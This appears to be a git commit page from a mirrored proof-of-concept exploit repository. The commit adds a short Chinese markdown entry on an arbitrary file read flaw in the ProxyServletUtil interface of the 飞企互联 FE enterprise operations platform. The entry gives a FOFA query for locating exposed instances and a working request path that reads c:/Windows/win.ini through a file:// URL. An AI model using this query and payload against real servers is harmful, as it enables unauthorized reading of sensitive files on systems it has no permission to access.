mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md
This commit is contained in:
parent
8616603a03
commit
1a6a645e47
15
飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md
Normal file
15
飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md
Normal file
@ -0,0 +1,15 @@
|
|||||||
|
## 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞
|
||||||
|
|
||||||
|
飞企互联FE业务协作平台中的ProxyServletUti接口存在任意文件读取漏洞。攻击者可以通过构造特定请求,读取服务器上的敏感文件。
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
app="飞企互联-FE企业运营管理平台"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
/ProxyServletUtil?url=file:///c:/Windows/win.ini
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user